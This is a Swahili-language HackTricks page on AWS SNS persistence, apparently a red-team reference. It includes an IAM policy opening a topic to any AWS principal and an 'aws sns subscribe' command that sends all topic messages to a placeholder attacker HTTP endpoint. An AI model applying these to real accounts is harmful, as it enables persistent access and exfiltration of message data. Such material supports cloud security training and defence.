Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - SNS Persistence

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

SNS

Kwa habari zaidi angalia:

pageAWS - SNS Enum

Uhifadhi

Unapotengeneza mada ya SNS unahitaji kuonyesha kwa sera ya IAM nani ana ruhusa ya kusoma na kuandika. Inawezekana kuonyesha akaunti za nje, ARN za majukumu, au hata "*". Sera ifuatayo inampa kila mtu katika AWS ruhusa ya kusoma na kuandika kwenye mada ya SNS inayoitwa MySNS.fifo:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Unda Wafuatiliaji

Ili kuendelea kuchota ujumbe wote kutoka kwenye mada zote, mshambuliaji anaweza kuunda wafuatiliaji kwa ajili ya mada zote.

Tafadhali kumbuka kwamba ikiwa mada ni ya aina ya FIFO, wafuatiliaji wanaotumia itifaki ya SQS ndio wanaweza kutumika.

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - S3 PersistenceNextAWS - Secrets Manager Persistence

Last updated